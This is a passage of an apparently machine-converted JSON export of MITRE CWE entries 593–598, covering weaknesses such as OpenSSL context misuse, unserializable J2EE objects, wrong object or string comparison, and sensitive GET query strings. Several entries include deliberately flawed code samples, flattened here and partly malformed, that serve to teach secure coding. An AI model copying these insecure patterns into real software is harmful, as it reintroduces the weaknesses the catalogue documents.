Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Common_Consequences, Description, Name, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":{"#text":"Authentication Bypass Issues","attr":{"@_Date":"2017-05-03"}}}},"593":{"attr":{"@_ID":"593","@_Name":"Authentication Bypass: OpenSSL CTX Object Modified after SSL Objects are Created","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software modifies the SSL context after connection creation has begun.","Extended_Description":"If the program modifies the SSL_CTX object after creating SSL objects from it, there is the possibility that older SSL objects created from the original context could all be affected by that change.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"No authentication takes place in this process, bypassing an assumed protection of encryption."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The encrypted communication between a user and a trusted host may be subject to a sniffing attack."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a language or a library that provides a cryptography framework at a higher level of abstraction."},{"Phase":"Implementation","Description":"Most SSL_CTX functions have SSL counterparts that act on SSL-type objects."},{"Phase":"Implementation","Description":"Applications should set up an SSL_CTX completely, before creating SSL objects from it."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define CERT \\"secret.pem\\"#define CERT2 \\"secret2.pem\\"int main(){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"SSL_CTX *ctx;SSL *ssl;init_OpenSSL();seed_prng();ctx = SSL_CTX_new(SSLv23_method());if (SSL_CTX_use_certificate_chain_file(ctx, CERT) != 1)if (SSL_CTX_use_PrivateKey_file(ctx, CERT, SSL_FILETYPE_PEM) != 1)if (!(ssl = SSL_new(ctx)))if ( SSL_CTX_set_default_passwd_cb(ctx, \\"new default password\\" != 1))if (!(ssl2 = SSL_new(ctx)))","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"int_error(\\"Error loading certificate from file\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"int_error(\\"Error loading private key from file\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"int_error(\\"Error creating an SSL context\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"int_error(\\"Doing something which is dangerous to do anyways\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"int_error(\\"Error creating an SSL context\\");","attr":{"@_style":"margin-left:10px;"}}]}}}}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"94"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Common_Consequences, Relationships"}]}},"594":{"attr":{"@_ID":"594","@_Name":"J2EE Framework: Saving Unserializable Objects to Disk","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"When the J2EE container attempts to write unserializable objects to disk there is no guarantee that the process will complete successfully.","Extended_Description":"In heavy load conditions, most J2EE application frameworks flush objects to disk to manage memory requirements of incoming requests. For example, session scoped objects, and even application scoped objects, are written to disk when required. While these application frameworks do the real work of writing objects to disk, they do not enforce that those objects be serializable, thus leaving the web application vulnerable to crashes induced by serialization failure. An attacker may be able to mount a denial of service attack by sending enough requests to the server to force the web application to save objects to disk.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Data represented by unserializable objects can be corrupted."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Non-serializability of objects can lead to system crash."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"All objects that become part of session and application scope must implement the java.io.Serializable interface to ensure serializability of containing objects."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example, a Customer Entity JavaBean provides access to customer information in a database for a business application. The Customer Entity JavaBean is used as a session scoped object to return customer information to a Session EJB.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Entitypublic class Customer {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String id;private String firstName;private String lastName;private Address address;public Customer() {}public Customer(String id, String firstName, String lastName) {...}@Idpublic String getCustomerId() {...}public void setCustomerId(String id) {...}public String getFirstName() {...}public void setFirstName(String firstName) {...}public String getLastName() {...}public void setLastName(String lastName) {...}@OneToOne()public Address getAddress() {...}public void setAddress(Address address) {...}","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","",""]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":"public class Customer implements Serializable {...}"}],"Body_Text":"However, the Customer Entity JavaBean is an unserialized object which can cause serialization failure and crash the application when the J2EE container attempts to write the object to the system. Session scoped objects must implement the Serializable interface to ensure that the objects serialize properly."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Persistence in J2EE Frameworks","attr":{"@_Date":"2008-04-11"}}}},"595":{"attr":{"@_ID":"595","@_Name":"Comparison of Object References Instead of Object Contents","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program compares object references instead of the contents of the objects themselves, preventing it from detecting equivalent objects.","Extended_Description":"For example, in Java, comparing objects using == usually produces deceptive results, since the == operator compares object references rather than values; often, this means that using == for strings is actually comparing the strings\' references, not their values.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1025","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context","Note":"This weakness can lead to erroneous results that can cause unexpected application behaviors."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"In Java, use the equals() method to compare objects instead of the == operator. If using ==, it is important for performance reasons that your objects are created by a static factory, not by a constructor."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-60"},"Intro_Text":"In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String str1 = new String(\\"Hello\\");String str2 = new String(\\"Hello\\");if (str1 == str2) {}","xhtml:br":["",""],"xhtml:div":{"#text":"System.out.println(\\"str1 == str2\\");","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"if (str1.equals(str2)) {}","xhtml:div":{"#text":"System.out.println(\\"str1 equals str2\\");","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"However, the if statement will not be executed as the strings are compared using the \\"==\\" operator. For Java objects, such as String objects, the \\"==\\" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method:"},{"Intro_Text":"In the following Java example, two BankAccount objects are compared in the isSameAccount method using the == operator.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public boolean isSameAccount(BankAccount accountA, BankAccount accountB) {}","xhtml:div":{"#text":"return accountA == accountB;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public boolean isSameAccount(BankAccount accountA, BankAccount accountB) {}","xhtml:div":{"#text":"return accountA.equals(accountB);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["Using the == operator to compare objects may produce incorrect or deceptive results by comparing object references rather than values. The equals() method should be used to ensure correct results or objects should contain a member variable that uniquely identifies the object.","The following example shows the use of the equals() method to compare the BankAccount objects and the next example uses a class get method to retrieve the bank account number that uniquely identifies the BankAccount object to compare the objects."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP02-J","Entry_Name":"Use the two-argument Arrays.equals() method to compare the contents of arrays"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP02-J","Entry_Name":"Use the two-argument Arrays.equals() method to compare the contents of arrays"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP03-J","Entry_Name":"Do not use the equality operators when comparing values of boxed primitives"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-954"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Other_Notes, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Incorrect Object Comparison: Syntactic","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Syntactic Object Comparison","attr":{"@_Date":"2009-05-27"}}]}},"596":{"attr":{"@_ID":"596","@_Name":"DEPRECATED: Incorrect Semantic Object Comparison","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated. It was poorly described and difficult to distinguish from other entries. It was also inappropriate to assign a separate ID solely because of domain-specific considerations. Its closest equivalent is CWE-1023.","Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Relationships, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Incorrect Object Comparison: Semantic","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Semantic Object Comparison","attr":{"@_Date":"2018-03-27"}}]}},"597":{"attr":{"@_ID":"597","@_Name":"Use of Wrong Operator in String Comparison","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses the wrong operator when comparing a string, such as using \\"==\\" when the .equals() method should be used instead.","Extended_Description":"In Java, using == or != to compare two strings for equality actually compares two objects for equality rather than their string values for equality. Chances are good that the two references will never be equal. While this weakness often only affects program correctness, if the equality is used for a security decision, the unintended comparison result could be leveraged to affect program security.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"595","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"595","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"480","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":{"#text":"Within Java, use .equals() to compare string values.Within JavaScript, use == to compare string values.Within PHP, use == to compare a numeric value to a string value. (PHP converts the string to a number.)","xhtml:br":["",""]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-60"},"Intro_Text":"In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String str1 = new String(\\"Hello\\");String str2 = new String(\\"Hello\\");if (str1 == str2) {}","xhtml:br":["",""],"xhtml:div":{"#text":"System.out.println(\\"str1 == str2\\");","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"if (str1.equals(str2)) {}","xhtml:div":{"#text":"System.out.println(\\"str1 equals str2\\");","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"However, the if statement will not be executed as the strings are compared using the \\"==\\" operator. For Java objects, such as String objects, the \\"==\\" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method:"},{"Intro_Text":"In the example below, three JavaScript variables are declared and initialized with the same values. Note that JavaScript will change a value between numeric and string as needed, which is the reason an integer is included with the strings. An if statement is used to determine whether the values are the same.","Example_Code":[{"#text":"<p id=\\"ieq3s1\\" type=\\"text\\">(i === s1) is FALSE</p><p id=\\"s4eq3i\\" type=\\"text\\">(s4 === i) is FALSE</p><p id=\\"s4eq3s1\\" type=\\"text\\">(s4 === s1) is FALSE</p>var i = 65;var s1 = \'65\';var s4 = new String(\'65\');if (i === s1){}if (s4 === i){}if (s4 === s1){}","attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:br":["","","","","","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"document.getElementById(\\"ieq3s1\\").innerHTML = \\"(i === s1) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"document.getElementById(\\"s4eq3i\\").innerHTML = \\"(s4 === i) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"document.getElementById(\\"s4eq3s1\\").innerHTML = \\"(s4 === s1) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"<p id=\\"ieq2s1\\" type=\\"text\\">(i == s1) is FALSE</p><p id=\\"s4eq2i\\" type=\\"text\\">(s4 == i) is FALSE</p><p id=\\"s4eq2s1\\" type=\\"text\\">(s4 == s1) is FALSE</p>var i = 65;var s1 = \'65\';var s4 = new String(\'65\');if (i == s1){}if (s4 == i){}if (s4 == s1){}","attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:br":["","","","","","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"document.getElementById(\\"ieq2s1\\").innerHTML = \\"(i == s1) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"document.getElementById(\\"s4eq2i\\").innerHTML = \\"(s4 == i) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"document.getElementById(\\"s4eq2s1\\").innerHTML = \\"(s4 == s1) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":{"xhtml:p":["However, the body of the if statement will not be executed, as the \\"===\\" compares both the type of the variable AND the value. As the types of the first comparison are number and string, it fails. The types in the second are int and reference, so this one fails as well. The types in the third are reference and string, so it also fails.","While the variables above contain the same values, they are contained in different types, so the document.getElementById... statement will not be executed in any of the cases.","To compare object values, the previous code is modified and shown below to use the \\"==\\" for value comparison so the comparison in this example executes the HTML statement:"]}},{"Intro_Text":"In the example below, two PHP variables are declared and initialized with the same numbers - one as a string, the other as an integer. Note that PHP will change the string value to a number for a comparison. An if statement is used to determine whether the values are the same.","Example_Code":[{"#text":"var $i = 65;var $s1 = \\"65\\";if ($i === $s1){}else{}","attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:br":["","","","","","","","",""],"xhtml:div":[{"#text":"echo \'($i === $s1) is TRUE\'. \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'($i === $s1) is FALSE\'. \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"var $i = 65;var $s1 = \\"65\\";if ($i == $s1){}else{}","attr":{"@_Nature":"good","@_Language":"PHP"},"xhtml:br":["","","","","","","","",""],"xhtml:div":[{"#text":"echo \'($i == $s1) is TRUE\'. \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'($i == $s1) is FALSE\'. \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":{"xhtml:p":["However, the body of the if statement will not be executed, as the \\"===\\" compares both the type of the variable AND the value. As the types of the first comparison are number and string, it fails.","While the variables above contain the same values, they are contained in different types, so the TRUE portion of the if statement will not be executed.","To compare object values, the previous code is modified and shown below to use the \\"==\\" for value comparison (string converted to number) so the comparison in this example executes the TRUE statement:"]}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP03-J","Entry_Name":"Do not use the equality operators when comparing values of boxed primitives"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP03-J","Entry_Name":"Do not use the equality operators when comparing values of boxed primitives"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP35-PL","Entry_Name":"Use the correct operator type for comparing values","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Typos", Page 289"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Erroneous String Compare","attr":{"@_Date":"2008-04-11"}}}},"598":{"attr":{"@_ID":"598","@_Name":"Use of GET Request Method With Sensitive Query Strings","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The web application uses the HTTP GET method to process a request and includes sensitive information in the query string of that request.","Extended_Description":"The query string for the URL could be saved in the browser\'s history, passed through Referers to other web sites, stored in web logs, or otherwise recorded in other sources. If the query string contains sensitive information such as session identifiers, then attackers can use this information to launch further attacks.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"201","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"At a minimum, attackers can garner information from query strings that can be utilized in escalating their method of attack, such as information about the internal workings of the application or database column names. Successful exploitation of query string parameter vulnerabilities could lead to an attacker impersonating a legitimate user, obtaining proprietary data, or simply executing actions not intended by the application developers."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When sensitive information is sent, use the POST method (e.g. registration form)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Potential_Mitigations, 